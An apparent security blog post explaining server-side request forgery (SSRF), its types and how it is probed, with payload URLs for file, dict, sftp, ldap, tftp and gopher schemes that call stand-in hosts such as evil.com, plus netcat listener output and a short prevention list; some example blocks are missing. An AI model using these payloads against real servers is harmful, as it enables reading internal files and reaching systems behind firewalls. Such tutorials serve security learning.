SSRF: Server Side Request Forgery

The Server Side Request Forgery or SSRF is a web application or a web server vulnerability that allows attackers to gain control inter-server requests from the vulnerable server. In other words, The vulnerability in a web server or in a web application allows attackers to send requests made by the web application. The end target always an internal system that holds data and sits behind the firewall, IDS or IPS etc and thus is inaccessible from the internet.

Well, in a simple term, an attacker sits in his desk and orders webserver to do the job on his behalf.

As I mentioned above, the targets systems often stays behind the firewall or IDS or IPS, thus, the attacker cannot send direct requests to his victim’s server, he has to make sure that the target machine is exploitable. So he does the following to scan the network.

  • Send a request to the vulnerable web server that abuses the SSRF vulnerability.
  • The web server makes a request to the victim’s server which sits behind a firewall.
  • The victim’s server responds with the data.
  • If the SSRF vulnerability in the server permits it, the response is sent back to the attacker.
  • The attacker modifies the request and gains access using different methodologies.

Impacts of SSRF Exploit

  • Hackers will be able to scan local or external network
  • Hackers will be able to read files from the exploited server
  • Hackers will be able to take control of internal systems and network
  • Using SSRF exploit hacker will be able to perform remote code execution

Types of SSRF?

There are couple of SSRF types notrmally used to carry-out the attack.

Direct SSRF

The Direct SSRF can be done using couple of different ways. A (a) Content based SSRF and (b) Boolean based SSRF.

The Content based SSRF is a widely used attack type where the attacker uses the content of the URL in the server’s response to carry an attack.

The Boolean based attack carried when a specific URL is unreachable, or when the server sends an error message/ response code to attackers request. The attacker then uses the response codes like 404 or 500 to carry out the exploit.

Indirect SSRF

The Indirect SSRF also known as Blind SSRF because of this type of attack carried-out without getting any status code/response from the target. For example, the attacker is unaware if the target server is up or down as there is no status code, or response is sent back from the server to identify if it is running.

The attacker normally carries out the attack based on the time difference to rectify the target machine’s status. The attacker keeps trying a number of times until the connection is closed. As I said above, he uses the difference in time to confirm whether the target host is up. If the target takes a lot of time to respond, the attacker confirms the specified host is down. The indirect SSRF is the most difficult type to exploit as there is no response from the server, so the “guessing” game works here.

How to perform SSRF Exploit

Probing

Every exploit has a numerous method of probing before it becomes an “Exploit”. The hacker practices different types of techniques on his target until he gets the right exploit to work on. The same works with SSRF. The process of enumerating the target called probing.

In the SSRF probing, attacker sends a request using a specific URL as a “Payload” through HTTP GET parameter or what we call a HTTP POST data – commonly known as “SSRF Vector”. Normally the payloads contain special characters such a “?” or “#” etc.

Example:

The above code is a simple request that makes a request to server sung a specific URL and the web server returns with a response “stock status” to the requesting user’s browser/ or an app. If the webserver can be exploitable to SSRF, the attacker can modify the request using tools like BURP Suite by intercepting the request and modifying it like below.

The vulnerable server in returns fetch the contents of the localhost/admin URL and return it to the user. – This is called SSRF. Also, using special characters I mentioned above attacker can perform SSRF attack. If the target server possible SSRF vuln in the URL, http://mybestshoppe.com/u=xxxxVULNURLsxx where the xxxxVULNURLsxx is SSRF vector, which attacker is able to replace it to call another website or target http://calling_url.com/?id=1&allow=yes and replace it to xxxxVULNURLsxx, the request becomes http://target.com/?u=http://calling_url.com/?id=1&allow=yes.

Where You Can Find SSRF Vulnerabilities

  • Normally, you can find SSRF vuln, where there is a possibility of network request to an internal server from the Internet.
  • All the requests from a remote server (Upload files etc)
  • Where there are apps running using databases such as Oracle, MongoDB, MSSQL and Postgres etc
  • Email servers
  • File processing, encoding processing, attribute information processing. etc.

Different ways of SSRF Exploits

SSRF to Reflected XSS (SSRF to Cross-Site Scripting)

Simply fetch a file from external sites which has malicious payload with content type served as html. Example – http://vuln-web-appcom:4200/?url=http://letmehackyourserver.com/virus.svg

file:///

The file payload is used to fetch a file from the server file system.
http://example.com/vuln-ssrf.php?url=file:///etc/passwd and or http://example.com/vuln-ssrf.php?url=file:///C:/Windows/win.ini

The output of http://localost/ssrf.php?image_url=file:///etc/passwd would be someting like this:

dict:// –

DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol:

http://example.com/ssrf.php?dict://evil.com:1337/

evil.com:$ nc -lvp 1337
Connection from [192.168.0.12] port 1337 [tcp/*] accepted (family 2, sport 31126)
CLIENT libcurl 7.40.0

sftp:// –

Sftp stands for SSH File Transfer Protocol, or Secure File Transfer Protocol, is a separate protocol packaged with SSH that works in a similar way over a secure connection.

http://example.com/ssrf.php?url=sftp://evil.com:1337/

evil.com:$ nc -lvp 1337
Connection from [192.168.0.12] port 1337 [tcp/*] accepted (family 2, sport 37146)
SSH-2.0-libssh2_1.4.2

ldap:// or ldaps:// or ldapi:// –

LDAP stands for Lightweight Directory Access Protocol. It is an application protocol used over an IP network to manage and access the distributed directory information service.

http://example.com/ssrf.php?url=ldap://localhost:1337/%0astats%0aquit
http://example.com/ssrf.php?url=ldaps://localhost:1337/%0astats%0aquit
http://example.com/ssrf.php?url=ldapi://localhost:1337/%0astats%0aquit

tftp://

Trivial File Transfer Protocol is a simple lockstep File Transfer Protocol which allows a client to get a file from or put a file onto a remote host

http://example.com/ssrf.php?url=tftp://evil.com:1337/TESTUDPPACKET

evil.com:# nc -lvup 1337
Listening on [0.0.0.0] (family 0, port 1337)
TESTUDPPACKEToctettsize0blksize512timeout3

gopher:// –

Gopher, is a distributed document delivery service. It allows users to explore, search and retrieve information residing on different locations in a seamless fashion.

http://example.com/ssrf.php?url=http://attacker.com/gopher.phpgopher.php (host it on acttacker.com):-
<?php
   header(‘Location: gopher://evil.com:1337/_Hi%0Assrf%0Atest’);
?>

evil.com:# nc -lvp 1337
Listening on [0.0.0.0] (family 0, port 1337)
Connection from [192.168.0.12] port 1337 [tcp/*] accepted (family 2, sport 49398)
Hi
ssrf
test

For more Refer here

Scan for internal networks and ports –

What if they are running some servers in their LAN (Kibana, Elastic Search,MongoDB.. )

Which we can not access from internet directly as firewall blocks them

Ref (medium1 and medium2)

Prevention

  1. Disable unused URL schemas like file:// , ftp:// , gopher://
  2. Password protect the Internal services and add an extra layer of protection like IDS.

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: https://www.hackthebox.eu/home/users/profile/68523

View all posts by Navin →

Leave a Reply

Leave a Reply

  Subscribe  
Notify of

You cannot copy content of this page

%d bloggers like this: